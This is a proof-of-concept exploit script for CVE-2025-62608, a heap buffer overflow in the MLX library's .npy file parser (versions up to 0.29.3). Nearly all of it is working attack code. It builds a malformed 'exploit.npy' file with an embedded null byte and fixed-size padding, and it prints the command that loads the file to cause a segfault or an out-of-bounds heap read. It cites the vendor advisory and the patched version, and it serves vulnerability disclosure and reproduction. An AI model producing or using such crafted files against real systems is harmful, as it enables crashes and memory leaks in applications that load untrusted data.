#!/usr/bin/env python3 """ Exploit Title: MLX <= 0.29.3 - Heap-based Buffer Overflow in .npy Parser CVE: CVE-2025-62608 Date: 2026-02-24 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamer_security Vendor Homepage: https://github.com/ml-explore/mlx Software Link: https://github.com/ml-explore/mlx Affected: mlx <= 0.29.3 (pip package) Tested on: Ubuntu 22.04 / Python 3.11 + mlx 0.29.3 Category: Denial of Service / Local Platform: Linux / macOS (Apple Silicon) Exploit Type: Proof of Concept CVSS: 5.5 (Medium) - AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H Description: Heap-buffer-overflow (CWE-122) in mlx::core::load() during NumPy .npy parsing. Early null byte truncates std::string; fixed offset access (header[34]) causes 13-byte out-of-bounds heap read → crash or limited info leak. Fixed in: mlx >= 0.29.4 Usage: python3 cve-2025-62608.py python3 -c "import mlx.core as mx; mx.load('exploit.npy')" Notes: Triggers segfault or ASan heap-buffer-overflow. Reference: https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6 """ BANNER = r""" ███╗ ███╗██╗ ██╗ ██╗ ██╗ ██╗███████╗ █████╗ ██████╗ ████╗ ████║██║ ╚██╗██╔╝ ██║ ██║██╔════╝██╔══██╗██╔══██╗ ██╔████╔██║██║ ╚███╔╝ ███████║█████╗ ███████║██████╔╝ ██║╚██╔╝██║██║ ██╔██╗ ╚════██║██╔══╝ ██╔══██║██╔══██╗ ██║ ╚═╝ ██║███████╗██╔╝ ██╗ ██║███████╗██║ ██║██║ ██║ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ CVE-2025-62608 • Heap Buffer Overflow • MLX .npy Exploit PoC by Mohammed Idrees Banyamer (@banyamer_security) =================================================== """ print(BANNER) import struct import os # ────────────────────────────────────────────────────────────────────────────── # Generate malicious .npy file (reproduces advisory condition exactly) # ────────────────────────────────────────────────────────────────────────────── magic = b'\x93NUMPY' version = b'\x01\x00' # NumPy v1.0 header_content = b"{'descr': '<u2', 'fo\x00\x00\x00\x00n_order': False, 'shape': (3,), }" # Exactly 118 bytes header + newline (v1 .npy format) padding = b' ' * (118 - len(header_content) - 1) header = header_content + padding + b'\n' payload = ( magic + version + struct.pack('<H', 118) + header + b'\x00\x00\x00\x80\xff\xff' # minimal dummy data ) filename = "exploit.npy" try: with open(filename, "wb") as f: f.write(payload) abs_path = os.path.abspath(filename) file_size = os.path.getsize(filename) print(f"[+] Malicious .npy file generated successfully!") print(f" Path : {abs_path}") print(f" Size : {file_size} bytes") print("\n[+] To trigger the heap overflow:") print(f" python3 -c \"import mlx.core as mx; mx.load('{filename}')\"") print("\nOn vulnerable mlx <= 0.29.3 you should see:") print(" → Segmentation fault") print(" or ASan report: heap-buffer-overflow (read ~13 bytes past buffer)") print("\nPatched in: mlx >= 0.29.4") print("Advisory: https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6") except Exception as e: print(f"[-] Failed to write file: {e}")